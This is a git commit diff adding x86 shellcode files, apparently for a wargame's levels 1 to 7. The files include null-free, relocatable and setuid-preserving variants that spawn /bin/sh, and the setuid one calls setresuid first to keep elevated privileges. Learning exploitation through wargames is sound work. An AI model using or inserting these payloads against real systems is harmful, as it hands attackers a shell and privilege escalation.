diff options
| author | Iru Cai <mytbk920423@gmail.com> | 2018-10-05 17:41:48 +0800 |
|---|---|---|
| committer | Iru Cai <mytbk920423@gmail.com> | 2018-10-05 17:41:48 +0800 |
| commit | 62d1287693cbb282570c52f44bfcc0be0e590d7f (patch) | |
| tree | 92261652f6ae3a139a8c36bdf0caf3182ed79c51 /shellcode | |
| download | iogame-62d1287693cbb282570c52f44bfcc0be0e590d7f.tar.xz | |
level 1~7, shellcode
Diffstat (limited to 'shellcode')
| -rw-r--r-- | shellcode/exec-reloc-nozero.S | 10 | ||||
| -rw-r--r-- | shellcode/exec-reloc.S | 11 | ||||
| -rw-r--r-- | shellcode/exec-suid.S | 21 | ||||
| -rw-r--r-- | shellcode/exec-suid.asm | 19 | ||||
| -rw-r--r-- | shellcode/exec.S | 8 | ||||
| -rw-r--r-- | shellcode/exec.asm | 8 |
6 files changed, 77 insertions, 0 deletions
diff --git a/shellcode/exec-reloc-nozero.S b/shellcode/exec-reloc-nozero.S new file mode 100644 index 0000000..f5e2765 --- /dev/null +++ b/shellcode/exec-reloc-nozero.S @@ -0,0 +1,10 @@ +.global _start +_start: + xorl %eax,%eax + addb $11, %al + movl $0x3058431f, %ebx + xorl $0x30303030, %ebx # "/sh\0" + pushl %ebx + pushl $0x6e69622f # "/bin" + movl %esp, %ebx + int $0x80 diff --git a/shellcode/exec-reloc.S b/shellcode/exec-reloc.S new file mode 100644 index 0000000..077babb --- /dev/null +++ b/shellcode/exec-reloc.S @@ -0,0 +1,11 @@ +.global _start +_start: +movl $11, %eax +call next +next: +movl (%esp), %ebx +addl $(_cmd-next), %ebx +int $0x80 +_cmd: +.ascii "/bin/sh" +.byte 0 diff --git a/shellcode/exec-suid.S b/shellcode/exec-suid.S new file mode 100644 index 0000000..94ec68a --- /dev/null +++ b/shellcode/exec-suid.S @@ -0,0 +1,21 @@ +.global _start +_start: + xorl %eax, %eax + addb $201, %al # geteuid + int $0x80 + movl %eax, %ebx + movl %eax, %ecx + movl %eax, %edx + xorl %eax, %eax + addb $208, %al # setresuid + int $0x80 + xorl %eax, %eax + addb $11, %al + movl $0x3058431f, %ebx + xorl $0x30303030, %ebx # "/sh\0" + pushl %ebx + pushl $0x6e69622f # "/bin" + movl %esp, %ebx + xorl %ecx, %ecx + xorl %edx, %edx + int $0x80 diff --git a/shellcode/exec-suid.asm b/shellcode/exec-suid.asm new file mode 100644 index 0000000..b978195 --- /dev/null +++ b/shellcode/exec-suid.asm @@ -0,0 +1,19 @@ +xor eax, eax +add al, 201 +int 0x80 +mov ebx, eax +mov ecx, eax +mov edx, eax +xor eax, eax +add al, 208 +int 0x80 +xor eax, eax +add al, 11 +mov ebx, 0x3058431f +xor ebx, 0x30303030 +push ebx +push 0x6e69622f +mov ebx, esp +xor ecx, ecx +xor edx, edx +int 0x80 diff --git a/shellcode/exec.S b/shellcode/exec.S new file mode 100644 index 0000000..660057b --- /dev/null +++ b/shellcode/exec.S @@ -0,0 +1,8 @@ +.global _start +_start: +movl $11, %eax +leal _cmd, %ebx +int $0x80 +_cmd: +.ascii "/bin/sh" +.byte 0 diff --git a/shellcode/exec.asm b/shellcode/exec.asm new file mode 100644 index 0000000..ca8960d --- /dev/null +++ b/shellcode/exec.asm @@ -0,0 +1,8 @@ +mov al, 0x70 +sub al, 0x65 +mov ebx, 0x30584361 +xor ebx, 0x3030304e +push ebx +push 0x6e69622f +mov ebx, esp +int 0x80 |